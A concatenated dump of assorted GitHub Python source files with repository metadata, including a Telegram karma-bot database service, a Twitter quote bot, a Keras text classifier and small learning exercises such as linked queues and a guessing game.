does_chat_exist(self, chat_id: str) -> bool:\n \"\"\"Returns true if chat exists\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n selectcmd = \"SELECT chat_id, chat_name FROM telegram_chat tc where tc.chat_id=%s\"\n crs.execute(selectcmd, [chat_id])\n return crs.fetchone() is not None\n\n def save_or_create_user_in_chat(self,\n user: User,\n chat_id: str,\n change_karma=0) -> User_in_Chat:\n \"\"\"Creates user in chat if not exists otherwise updates user_in_chat karma\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n # TODO: instead of select first, do insert and then trap exception\n # if primary key exists\n # selectcmd = \"SELECT user_id, chat_id, karma FROM user_in_chat uic where uic.user_id=%s AND uic.chat_id=%s\"\n\n insertcmd_karma = \"\"\"INSERT into user_in_chat\n (user_id, chat_id, karma) VALUES (%s,%s,%s)\n ON CONFLICT (user_id,chat_id) DO UPDATE SET karma = user_in_chat.karma + %s\n RETURNING karma\n \"\"\"\n\n # TODO: used named parameters instead of %s to not have to repeat\n # these params\n crs.execute(\n insertcmd_karma, [\n user.get_user_id(), chat_id, change_karma, change_karma])\n\n row = crs.fetchone()\n self.conn.commit()\n karma = row[0]\n return User_in_Chat(user.id, chat_id, karma)\n\n def user_reply_to_message(self,\n reply_from_user_unsaved: User,\n reply_to_user_unsaved: User,\n chat: Telegram_Chat,\n original_message: Telegram_Message,\n reply_message: Telegram_Message,\n karma: int):\n \"\"\"Processes a user replying to another users message with a given karma.\n Saves both users, both messages, updates user in chat and creates a user_reacted_to_message row\"\"\"\n user: User = self.save_or_create_user(reply_from_user_unsaved)\n reply_to_user: User = self.save_or_create_user(reply_to_user_unsaved)\n if not self.does_chat_exist(chat.chat_id):\n self.save_or_create_chat(chat)\n\n uic: User_in_Chat = self.save_or_create_user_in_chat(user, chat.chat_id)\n self.save_or_create_user_in_chat(reply_to_user, chat.chat_id)\n\n insert_message = \"\"\"INSERT INTO telegram_message\n (message_id,chat_id, author_user_id, message_text)\n VALUES (%s,%s,%s,%s)\n ON CONFLICT (message_id) DO UPDATE\n SET message_text = EXCLUDED.message_text;\n \"\"\"\n inserturtm = \"\"\"INSERT INTO user_reacted_to_message\n (user_id,message_id,react_score,react_message_id)\n VALUES (%s,%s,%s,%s)\"\"\"\n\n # TODO: manage this with a constraint rather than having to select\n selecturtmunique = \"\"\"SELECT react_score from user_reacted_to_message urtm where urtm.user_id=%s and urtm.message_id=%s\"\"\"\n # none if user hasn't reacted yet\n user_previous_react = None\n with self.conn:\n with self.conn.cursor() as crs:\n args_select_urtm = [uic.user_id, original_message.message_id]\n crs.execute(selecturtmunique, args_select_urtm)\n result = crs.fetchone()\n if result is not None:\n user_previous_react = result[0]\n\n # TODO: add gaurd for karma == 1 or == -1 up higher\n if user_previous_react is None or user_previous_react != karma:\n if karma in (1, -1):\n self.save_or_create_user_in_chat(\n reply_to_user, chat.chat_id, change_karma=karma)\n else:\n #TODO: move logging into handler\n logging.info(\n f\"invalid karma: {karma} passed to user_reply_to_message\")\n with self.conn:\n with self.conn.cursor() as crs:\n args_reply_message = [\n reply_message.message_id,\n chat.chat_id,\n uic.user_id,\n reply_message.message_text]\n args_original_message = [\n original_message.message_id,\n chat.chat_id,\n original_message.author_user_id,\n original_message.message_text]\n crs.execute(insert_message, args_reply_message)\n crs.execute(insert_message, args_original_message)\n argsurtm = [\n uic.user_id,\n original_message.message_id,\n karma,\n reply_message.message_id]\n crs.execute(inserturtm, argsurtm)\n\n #TODO: determine if this should be in the public api (super)\n def did_user_react_to_messages(self, username: str) -> bool:\n \"\"\"Returns true if a user has responded to some messages\"\"\"\n select_user_replies = \"\"\"select username, message_id, react_score, react_message_id from telegram_user tu\n left join user_reacted_to_message urtm on urtm.user_id=tu.user_id\n where tu.username = %s\"\"\"\n reacted_messages_result = None\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(select_user_replies, [username])\n reacted_messages_result = crs.fetchone()\n return reacted_messages_result is not None\n\n def get_karma_for_user_in_chat(self,\n username: str,\n chat_id: str) -> Optional[int]:\n \"\"\"Returns karma for a particular user in chat\n if that uic does not exist, return None\"\"\"\n cmd = \"\"\"select karma from telegram_user tu\n LEFT JOIN user_in_chat uic ON uic.user_id=tu.user_id\n where tu.username=%s AND uic.chat_id=%s\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n # TODO: handle | psycopg2.ProgrammingError: relation \"user_in_chat\"\n # does not exist\n crs.execute(cmd, [username, chat_id])\n result = crs.fetchone()\n if result is not None:\n return result[0]\n return result\n\n # TODO: pass in user_id\n # TODO: implement this as a stored procedure instead since there is a number of round trips\n # TODO: return some structure and then parse it\n\n def get_user_stats(self, username: str, chat_id: str) -> Dict:\n \"\"\"Returns Dictionary of statistics for a user given a username\"\"\"\n user = self.get_user_by_username(username)\n if user is None:\n raise UserNotFound()\n user_has_reacts = self.did_user_react_to_messages(username)\n karma = self.get_karma_for_user_in_chat(username, chat_id)\n if karma is None:\n karma = 0\n\n output_dict = None\n if not user_has_reacts:\n output_dict = {\n 'username': username,\n 'karma': karma,\n 'upvotes_given': 0,\n 'downvotes_given': 0,\n 'total_votes_given': 0,\n 'net_karma_given': 0}\n else:\n # how many reacts given out by user\n how_many_user_reacted_to_stats = \"\"\"select react_score, count(react_score)from\n (select username, message_id, react_score, react_message_id from telegram_user tu\n left join user_reacted_to_message urtm on urtm.user_id=tu.user_id\n where tu.username = %s) as sub left join telegram_message tm on tm.message_id= sub.message_id\n where tm.chat_id=%s group by react_score;\"\"\"\n # TODO: implement how many reacts recieved by user\n negative_karma_given = 0\n positive_karma_given = 0\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(\n how_many_user_reacted_to_stats, [\n username, chat_id])\n rows = crs.fetchall()\n # there are only two rows\n for row in rows:\n if row[0] == -1:\n negative_karma_given = int(row[1])\n if row[0] == 1:\n positive_karma_given = int(row[1])\n\n # TODO: make this output type a class instead to bundle this info\n output_dict = {\n 'username': username,\n 'karma': karma,\n 'upvotes_given': positive_karma_given,\n 'downvotes_given': negative_karma_given,\n 'total_votes_given': positive_karma_given + negative_karma_given,\n 'net_karma_given': positive_karma_given - negative_karma_given}\n return output_dict\n\n def get_chat_info(self, chat_id: str) -> Dict:\n \"\"\"Returns Dictionary of statistics for a chat given a chat_id\"\"\"\n count_reacts_cmd = \"\"\"select count(tm.message_id) from user_reacted_to_message urtm\n left join telegram_message tm ON tm.message_id = urtm.message_id\n where tm.chat_id=%s\"\"\"\n select_user_with_karma_count = \"\"\"\n select count(*) from telegram_chat tc\n left join user_in_chat uic on uic.chat_id = tc.chat_id\n where tc.chat_id=%s\n \"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n reply_count = None\n user_with_karma_count = None\n crs.execute(count_reacts_cmd, [chat_id])\n result = crs.fetchone()\n if result is not None:\n reply_count = result[0]\n else:\n reply_count = 0\n\n crs.execute(select_user_with_karma_count, [chat_id])\n result = crs.fetchone()\n if result is not None:\n user_with_karma_count = result[0]\n else:\n user_with_karma_count = 0\n return {'reply_count': reply_count,\n 'user_with_karma_count': user_with_karma_count}\n\n def get_responses_per_day(self, chat_id: str) -> Optional[Tuple[str, str]]:\n \"\"\"Returns responses per day per chat\"\"\"\n cmd = \"\"\"select date_trunc('day',tm.message_time ) \"day\", count(*) as result_nums\n from user_reacted_to_message urtm \n LEFT JOIN telegram_message tm ON tm.message_id=urtm.message_id\n WHERE tm.chat_id = %s AND tm.message_time is not null\n group by 1\n order by 1\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(cmd, [chat_id])\n return crs.fetchall()\n\n def clear_chat_with_bot(self, chat_id, user_id):\n if chat_id != user_id:\n raise ValueError(\"Not a chat with a bot. Don't delete group chats\")\n\n chat_id_str = str(chat_id)\n # delete user_in_chat\n del_user_in_chat_cmd = \"DELETE FROM user_in_chat uic WHERE uic.chat_id = %s\"\n\n # TODO: delete user_reacted_to_message find all message in chat, find all urtm with those messages then delete them\n del_user_reacted_to_message_cmd = \"\"\"DELETE FROM user_reacted_to_message urtmd WHERE id IN\n (select urtm.id as user_reacted_to_message_id FROM (select tm.message_id from telegram_message tm where tm.chat_id = %s) as message_in_chat\n LEFT JOIN user_reacted_to_message urtm on urtm.message_id=message_in_chat.message_id);\"\"\"\n\n # delete all telegram_messages with matching chat id\n del_telegram_messages = \"\"\"DELETE FROM user_reacted_to_message urtmd WHERE id IN\n (select urtm.id as user_reacted_to_message_id FROM (select tm.message_id from telegram_message tm where tm.chat_id = %s) as message_in_chat\n LEFT JOIN user_reacted_to_message urtm on urtm.message_id=message_in_chat.message_id);\"\"\"\n\n del_command_used = \"\"\"DELETE FROM command_used cu where chat_id=%s\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(del_user_in_chat_cmd, [chat_id_str])\n crs.execute(del_user_reacted_to_message_cmd, [chat_id_str])\n crs.execute(del_telegram_messages, [chat_id_str])\n crs.execute(del_command_used, [chat_id_str])\n #TODO: don't return optional\n\n def get_chats_user_is_in(self, user_id: int) -> Optional[List[Tuple[str, str]]]:\n \"\"\"Returns a list of chat_ids and chat names \"\"\"\n cmd = \"\"\"SELECT tc.chat_id, tc.chat_name from user_in_chat uic\n LEFT JOIN telegram_chat tc on tc.chat_id = uic.chat_id\n where uic.user_id = %s\n \"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(cmd, [user_id])\n return crs.fetchall()\n\n def get_chat_name(self, chat_id: str) -> Optional[str]:\n \"\"\"Returns chat name\"\"\"\n cmd = \"\"\"select chat_name from telegram_chat tc where tc.chat_id=%s\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(cmd, [chat_id])\n result = crs.fetchone()\n if result is None:\n return None\n else:\n return result[0] # unpack\n\n def create_chat_if_not_exists(self, chat_id: str):\n \"\"\"Creates chat if not exists otherwise does nothing\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n insertcmd = \"\"\"INSERT into telegram_chat\n (chat_id) VALUES (%s)\n ON CONFLICT (chat_id) DO NOTHING\"\"\"\n crs.execute(insertcmd, [chat_id])\n self.conn.commit()\n\n def use_command(self, command: str, user: User, chat_id: str, arguments=\"\"):\n \"\"\"Handler to log when commands are used and with which arguments\"\"\"\n self.create_chat_if_not_exists(chat_id)\n self.save_or_create_user(user)\n\n insertcmd = \"\"\"INSERT INTO command_used (command,arguments,user_id,chat_id) VALUES (%s,%s,%s,%s)\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(insertcmd, [command, arguments, user.id, chat_id])\n\n\nclass Neo4jKarmabotDatabaseService(KarmabotDatabaseService):\n \"\"\"Does connections to neo4j\"\"\"\n pass\n\n","repo_name":"schafezp/karmabot","sub_path":"karmabot/telegramservice.py","file_name":"telegramservice.py","file_ext":"py","file_size_in_byte":21661,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"29595566090","text":"import random\nimport tweepy\nimport click\n\ndef _get_random_quote():\n return random.choice(_quotes)\n\n@click.command()\n@click.argument(\"consumer_key\")\n@click.argument(\"consumer_secret\")\ndef authenticate(consumer_key, consumer_secret):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n try:\n url = auth.get_authorization_url()\n except tweepy.TweepError:\n click.echo(\"Failed to get request token.\")\n\n click.echo(\"Setting up authentication. Please visit this URL:\")\n click.echo(url)\n verifier = click.prompt(\"Enter the authorisation PIN from Twitter\")\n\n try:\n auth.get_access_token(verifier)\n except tweepy.TweepError:\n click.echo(\"Error! Failed to get access token.\")\n\n with open(\"OAUTH_CONSUMER\", \"w\") as f:\n click.echo(consumer_key, file=f)\n click.echo(consumer_secret, file=f)\n\n with open(\"OAUTH_TOKEN\", \"w\") as f:\n click.echo(auth.access_token, file=f)\n click.echo(auth.access_token_secret, file=f)\n\n api = tweepy.API(auth)\n\n public_tweets = api.home_timeline()\n for tweet in public_tweets:\n click.echo(tweet.text)\n\n@click.command()\ndef tweet():\n with open(\"OAUTH_CONSUMER\", \"r\") as f:\n lines = f.readlines()\n consumer_key = lines[0]\n consumer_secret = lines[1]\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\n with open(\"OAUTH_TOKEN\", \"r\") as f:\n lines = f.readlines()\n access_token = lines[0]\n access_token_secret = lines[1]\n\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n\n api.update_status(_get_random_quote())\n\n@click.group()\ndef cli():\n pass\n\ncli.add_command(authenticate)\ncli.add_command(tweet)\n\nif __name__ == '__main__':\n cli()","repo_name":"pixelistik/twitter-reminderbot","sub_path":"reminderbot.py","file_name":"reminderbot.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43264776709","text":"import cv2\nimport os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimgPath=\"./haze\"\nresPath=\"./result/2/\"\n\n#先删掉txt开头结尾无用信息 第一个检测用时较长统一长度Predicted in 211.740000 milli-seconds -->21.740000 milli-seconds\nwith open(\"result.txt\", \"r\") as f:\n #print(type(f))\n name=\"\"\n imgList=[] #存放name每个图片为一个元素\n imgBoxes=[] #存放name+\"*\"+检测框,每个框为一个元素\n for line in f.readlines():\n line = line.strip('\\n') #去掉列表中每一个元素的换行符\n #Enter Image Path: /xxx/xxx/xxx/xxx/JPEGImages/huwai_1_000008.jpg: Predicted in 21.531000 milli-seconds.\n if line[18]==\"/\":\n # print(\"-----name-----\")\n #xx/xx/xx/huwai_1_000008.jpg -->huwai_1_000008\n name=line[70:][:-43]\n imgList.append(line[70:][:-43])\n #print(line[70:][:-43])\n else:\n # print(name+line)\n imgBoxes.append(name+\"*\"+line)\n #huwai_1_000008*class: 99%\t(left_x: 118 top_y: 63 width: 68 height: 62)\n # print(\"-----draw-----\")\n # if line[0:3]==\"cow\":\n # print(name+line)\n # else\n # for box in imgBoxes:\n # print(box[0:box.rfind('*')]) #取*前面的name\n # print(box[box.rfind('*')+1:]) #取*后面的name包含的box\n \n \n # for imgName in imgList:\n # print(imgName)\n # for box in imgBoxes:\n # print(box[0:box.rfind('*')])\n #得到两个List后\n \n cmap = plt.get_cmap('tab20b')\n colors = [cmap(i)[:3] for i in np.linspace(0, 1, 20)]\n color = colors[int(4) % len(colors)]\n #修改int(4)里面的数字换为其他颜色\n color = [i * 255 for i in color] \n \n for imgName in imgList:\n i=0 #一个图片几个框\n im = cv2.imread(os.path.join(imgPath,imgName)+\".jpg\")\n print(imgName)\n for box in imgBoxes:\n i=i+1\n print(box[0:box.rfind('*')])\n if box[0:box.rfind('*')]==imgName: #匹配name,对于imgName的box\n boxList=box[box.rfind('*')+1:].split() #name包含的box [class,conf,_,x,_,y,_,w,_,h] str类型\n sx1=int(boxList[3])\n sy1=int(boxList[5])\n sx2=int(boxList[3])+int(boxList[7])\n sy2=int(boxList[5])+int(boxList[9][:-1])\n text=boxList[0]+boxList[1]\n \n #画框,文本\n cv2.rectangle(im,(sx1,sy1),(sx2,sy2),color,3)\n if sy1 > 25:\n cv2.rectangle(im, (sx1, sy1-20), (sx1+(len(boxList[0])+1)*17, sy1), color, -1)\n cv2.putText(im, text,(sx1, sy1-10),0, 0.75, (255,255,255),2)\n else:\n cv2.rectangle(im, (sx1, sy1), (sx1+(len(boxList[0])+1)*17, sy1+20), color, -1)\n cv2.putText(im, boxList[0] + boxList[1],(sx1, sy1+20),0, 0.75, (255,255,255),2)\n else:\n break \n cv2.imwrite(os.path.join(resPath,imgName)+\"_result.jpg\",im)\n print(\"save result:\\t\"+os.path.join(resPath,imgName)+\"_result.jpg\")\n del imgBoxes[0:i-1] #删除已经画过的框\n","repo_name":"fenglinlie/from-yolov3-result.txt-to-img","sub_path":"resDrawimg.py","file_name":"resDrawimg.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2571223363","text":"from flask import Flask, request, jsonify\nfrom flaskapp.libs.stringGetter import getPageString\nfrom flaskapp.libs.ssg.productsParser import getProducts\n\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/api/crawling/getSSG', methods=['GET'])\ndef getProductsInfo():\n keyword = request.args.get('keyword')\n url = \"http://www.ssg.com/search.ssg?target=all&query=\" + keyword\n pageString = getPageString(url)\n print(getProducts(pageString))\n return jsonify(getProducts(pageString))\n","repo_name":"owenyi/hanium","sub_path":"python/main/flaskapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22646537425","text":"import shutil\nfrom pathlib import Path\n\nbase_path = Path('ops_example')\nbase_path2 = Path('ops_example/D')\n\nif base_path.exists() and base_path.is_dir():\n \"\"\"Recursively delete a directory tree.\"\"\"\n shutil.rmtree(base_path) # usuniecie drzewa katalogów\n\n# utworzenie katalogu\nbase_path.mkdir()\n\npath_b = base_path / 'A' / 'B' # ops_example/A/B\npath_c = base_path / 'A' / 'C'\npath_d = base_path / 'A' / 'D'\n\npath_b.mkdir(parents=True) # parents=True bo musi jeszcze utworzyc katalog A zanim utworzy C\npath_c.mkdir() # tu katalog A juz był wiec umie utworzyc C\n\nfor filename in ('ex1.txt', 'ex2.txt', 'ex3.txt'):\n with open(path_b / filename, 'w', encoding='utf-8') as stream:\n stream.write(f\"Jakaś treść w pliku {filename}\")\n # ops_example/A/B/ex1.txt\n\n# przenosi do katalogu D pliki, usuneło katalog B\nshutil.move(path_b, path_d)\nex1 = path_d / 'ex1.txt'\n# zmian nazwy pliku\nex1.rename(ex1.parent / 'ex1renamed.log')\n\nprint(base_path.absolute())\n# /Users/radoslawjaniak/PycharmProjects/bootcamp-python-18-11/ops_example\n\nprint(base_path.name) # ops_example\nprint(base_path.parent.absolute())\n# /Users/radoslawjaniak/PycharmProjects/bootcamp-python-18-11\n\nprint(base_path.suffix)\nprint(ex1.suffix) # .txt\nprint(base_path.parts) # ('ops_example',)\nprint(base_path2.parts) # ('ops_example', 'D')\n","repo_name":"rajkonkret/bootcamp-python-18-11","sub_path":"6.1 - katalogi.py","file_name":"6.1 - katalogi.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8180312005","text":"import ccnpy\nimport ccnpy.flic\n\n\nclass Node(ccnpy.TlvType):\n __type = 0x0002\n\n @classmethod\n def class_type(cls):\n return cls.__type\n\n def __init__(self, node_data=None, hash_groups=None):\n \"\"\"\n\n :param node_data: (optional) ccnpy.flic.NodeData\n :param hash_groups: a list of HashGroups\n \"\"\"\n ccnpy.TlvType.__init__(self)\n if node_data is not None and not isinstance(node_data, ccnpy.flic.NodeData):\n raise TypeError(\"node_data must be ccnpy.flic.NodeData\")\n\n if hash_groups is None:\n raise ValueError(\"hash_groups must not be None\")\n\n if not isinstance(hash_groups, list) or len(hash_groups) == 0:\n raise TypeError(\"hash_groups must be a list of one or more ccnpy.flic.HashGroup\")\n\n self._node_data = node_data\n self._hash_groups = hash_groups\n\n self._tlv = ccnpy.Tlv(self.class_type(), [self._node_data, *self._hash_groups])\n\n def __len__(self):\n return len(self._tlv)\n\n def __eq__(self, other):\n if self.__dict__ == other.__dict__:\n return True\n return False\n\n def __repr__(self):\n hash_values_len = len(self.hash_values())\n return \"Node: {%r, %r, %r}\" % (self._node_data, hash_values_len, self._hash_groups)\n\n def node_data(self):\n return self._node_data\n\n def hash_groups(self):\n return self._hash_groups\n\n def serialize(self):\n return self._tlv.serialize()\n\n def serialized_value(self):\n \"\"\"\n The value of the Node's TLV byte array, which is used encrypted in an EncryptedNode via\n some algorithm.\n\n :return: byte array\n \"\"\"\n return self._tlv.value()\n\n def node_locator(self):\n \"\"\"\n A short-cut to calling node_data().locators()[0]\n :return: (node_data().locators[0], node_data.locators.final()) or (None, None)\n \"\"\"\n locator = None\n final = None\n if self._node_data is not None:\n locators = self._node_data.locators()\n if locators is not None:\n final = locators.final()\n locator = locators[0]\n return locator, final\n\n def hash_values(self):\n \"\"\"\n Return an in-order list of all pointer hash values from all hash groups\n :return: A list\n \"\"\"\n hash_values = []\n for hg in self._hash_groups:\n for hv in hg.pointers():\n hash_values.append(hv)\n return hash_values\n\n @classmethod\n def parse(cls, tlv):\n if tlv.type() != cls.class_type():\n raise RuntimeError(\"Incorrect TLV type %r\" % tlv.type())\n\n node_data = None\n hash_groups = []\n\n offset = 0\n while offset < tlv.length():\n inner_tlv = ccnpy.Tlv.deserialize(tlv.value()[offset:])\n offset += len(inner_tlv)\n\n if inner_tlv.type() == ccnpy.flic.NodeData.class_type():\n assert node_data is None\n node_data = ccnpy.flic.NodeData.parse(inner_tlv)\n\n elif inner_tlv.type() == ccnpy.flic.HashGroup.class_type():\n hash_group = ccnpy.flic.HashGroup.parse(inner_tlv)\n hash_groups.append(hash_group)\n\n else:\n raise RuntimeError(\"Unsupported packet TLV type %r\" % inner_tlv)\n\n return cls(node_data=node_data, hash_groups=hash_groups)\n","repo_name":"mmosko/ccnpy","sub_path":"ccnpy/flic/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9861591424","text":"from random import randint\nchislo = randint(0,7)\nnumber = int(input(\"Введите число от 0 до 10: \"))\nwhile number != chislo:\n if number > chislo:\n print(\"Загаданое число меньше! уменьшааай!\")\n if number < chislo:\n print(\"Загаданное число больше!!! Надо боольше ЗОЛОТА!\")\n if number == \"\":\n print(\"Вы не ввели ЧИСЛО!!! Число хочу, давай чило!А?\")\n number = int(input(\"Попробуй еще раз введи числдо 0 до 10: \"))\n if number == chislo:\n print(number, \"Правильное число! Вы победили!\")\n number = input(\"Хотите сыграть еще раз? да/нет?\")\n if number == \"да\":\n number = int(input(\"Попробуй еще раз введи числдо 0 до 10: \"))\nprint(\"досвидания\")\n","repo_name":"igorkrisin/python","sub_path":"Код из книги/GuessingGameNumber.py","file_name":"GuessingGameNumber.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830785466","text":"import tensorflow as tf\nfrom tensorflow import keras\n\nimport random\nimport numpy as np\nimport csv\n\nprocessed_data = open('processed_data.csv','r')\n\ndata_X = []\ndata_labels = []\n\nfirstline = processed_data.readline()\n\nmyreader = csv.reader(processed_data,delimiter=',')\nTFMap = {'True':1,'False':0}\nsublist = {\"AskReddit\":0,\"politics\":1,'worldnews':2,\n 'nba':3,'funny':4,'movies':5}\n\nfor line in myreader:\n data_X.append(np.array([int(x) for x in line[:-1]]))\n data_labels.append(np.array(sublist[line[-1]]))\n\n#test_data = np.array(train_data[4000:])\n#test_labels = np.array(train_labels[4000:])\n#train_data = np.array(train_data[:4000])\n#train_labels = np.array(train_labels[:4000])\n\nNUM_WORDS = len(data_X[0])\n\ntest_size = len(data_X)//10\nprint(\"beginning cross validation:\")\nscores = [];\nloss = []\nfor i in range(10):\n\n test_data = np.array(data_X[i*test_size:((i+1)*test_size+1)])\n test_labels = np.array(data_labels[i*test_size:((i+1)*test_size+1)])\n train_data = np.array(data_X[:i*test_size] + data_X[(i+1)*test_size+1:])\n train_labels = np.array(data_labels[:i*test_size] +\n data_labels[(i+1)*test_size+1:])\n model = keras.Sequential([\n # `input_shape` is only required here so that `.summary` works. \n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, activation=tf.nn.relu),\n #keras.layers.Dropout(0.3),\n #keras.layers.Dense(16, activation=tf.nn.relu),\n #keras.layers.Dropout(0.3),\n keras.layers.Dense(6, activation=tf.nn.softmax)\n ])\n\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n model.summary()\n print(\"train size: \",len(train_data),\"test size: \", len(test_data))\n history = model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=1)\n\n results = model.evaluate(test_data,test_labels)\n scores.append(results[1])\n loss.append(results[0])\n print(\"results\",results)\nprint(\"mean score\",np.mean(scores),\"stdev\",np.std(scores))\nprint(\"mean loss:\", np.mean(loss))\n\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\nhistory_dict = history.history\nhistory_dict.keys()\n\n# \"bo\" is for \"blue dot\"\nplt.plot(epochs, loss, 'bo', label='Training loss')\n# b is for \"solid blue line\"\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.show()\n\nplt.clf() # clear figure\nacc_values = history_dict['acc']\nval_acc_values = history_dict['val_acc']\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\n\nplt.show()\n\n","repo_name":"bhensey/349FinalProject","sub_path":"tensorflow_process.py","file_name":"tensorflow_process.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13739081240","text":"import json\nfrom pprint import pprint\n\n\"\"\" \nget_past_matches() returns a dictionary of a user's matches, which are\nindividual dictionaries.\nSample user data:\n {\n \"general\" : {\n \"name\" : \"John Smith\",\n \"zip code\" : 94555,\n \"gender\" : \"male\",\n \"year\" : 1\n },\n \"personality\" : {\n \"extroversion\" : 0.91,\n \"sensing\" : 0.32,\n \"thinking\" : 0.75,\n \"judging\" : 0.04\n },\n \"interests\" : [1, 5, 8]\n }\n\"\"\"\n\ndef get_past_matches():\n json_file = open('dataPast.json')\n jdata = json.load(json_file)\n past_matches = [user for user in jdata['users']]\n json_file.close()\n return past_matches\n # return {\"A\",\"B\",\"C\"}\n\ndef get_current_match(username): #user is a string\n json_matches = open('matches.json')\n match_data = json.load(json_matches)\n json_current = open('dataCurrent.json')\n current_data = json.load(json_current)\n\n usr = None\n for dict in match_data['matches']:\n if username == (dict[\"person1\"]):\n usr = dict[\"person2\"]\n elif username == (dict[\"person2\"]):\n usr = dict[\"person1\"]\n \n for user in current_data['users']:\n if user[\"general\"][\"name\"] == (usr):\n json_matches.close()\n json_current.close()\n return user\n\n json_matches.close()\n json_current.close()\n return None","repo_name":"mraheja/fifteen","sub_path":"match_utils.py","file_name":"match_utils.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37160677210","text":"# coding=utf-8\nimport click\n\nfrom ch.main import check_cli_version, add_commands, print_version\n\nfrom ch.log import configure_logger\n\nimport ch\n\n\n# is_eager=True 表明该命令行选项优先级高于其他选项;\n# expose_value=False 表示如果没有输入该命令行选项,会执行既定的命令行流程;\n# callback 指定了输入该命令行选项时,要跳转执行的函数;\n\n@click.group()\n@click.option('--version', is_flag=True, callback=print_version,\n expose_value=False, is_eager=True, help=\"Show version info\")\n@click.option('-v', '--verbose', count=True, help='Turn on debug logging')\ndef cli(verbose):\n \"\"\"\n Russell CLI interacts with Russell server and executes your commands.\n More help is available under each command listed below.\n \"\"\"\n ch.CODINGHUB_HOST = \"https://api.cannot.cc\"\n ch.CODINGHUB_WEB_HOST = \"https://web.cannot.cc\"\n ch.CODINGHUB_FS_HOST = \"fs.cannot.cc\"\n ch.CODINGHUB_FS_PORT = 8081\n configure_logger(verbose)\n\n\nadd_commands(cli)\n","repo_name":"zuiwan/CodingHub-CLI","sub_path":"ch/development/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41785596900","text":"import time\r\nimport random\r\n\r\n#Classe Nodo de uma estrutura duplamente encadeada(usado na fila)\r\nclass Nodo:\r\n def __init__(self, dado=0,proximo_nodo=None):\r\n self.dado = dado\r\n self.proximo = proximo_nodo\r\n\r\n #Printa o nodo e seu proximo\r\n def __repr__(self):\r\n return '%s -> %s' %(self.dado,self.proximo)\r\n\r\n#Classe Nodo de uma estrutura duplamente encadeada(usado na pilha)\r\nclass Nodo2:\r\n def __init__(self, dado=0, nodo_anterior=None):\r\n self.dado = dado\r\n self.anterior = nodo_anterior\r\n\r\n def __repr__(self):\r\n return '%s -> %s' % (self.dado, self.anterior)\r\n\r\n#Fila usando estrutura encadeada\r\nclass Fila:\r\n def __init__(self):\r\n self.primeiro = None\r\n self.ultimo = None\r\n \r\n #Printa a fila, repr retorna a representação como string\r\n def __repr__(self):\r\n return \"[\" + str(self.primeiro) + \"]\"\r\n \r\n #Método inserir, insere no final por ser uma fila\r\n def insere(self, novo_dado):\r\n \r\n #Criação de um novo nodo com um dado para ser armazenado\r\n novo_nodo = Nodo(novo_dado)\r\n \r\n #Se a fila estiver vazia, insere\r\n if self.primeiro == None:\r\n self.primeiro = novo_nodo\r\n self.ultimo = novo_nodo\r\n else:\r\n #Define o nodo novo como o ultimo elemento da fila\r\n self.ultimo.proximo = novo_nodo\r\n #Define que o último elemento da fila aponte para o novo nodo\r\n self.ultimo = novo_nodo\r\n \r\n #Método remover, remove no início por ser uma fila\r\n 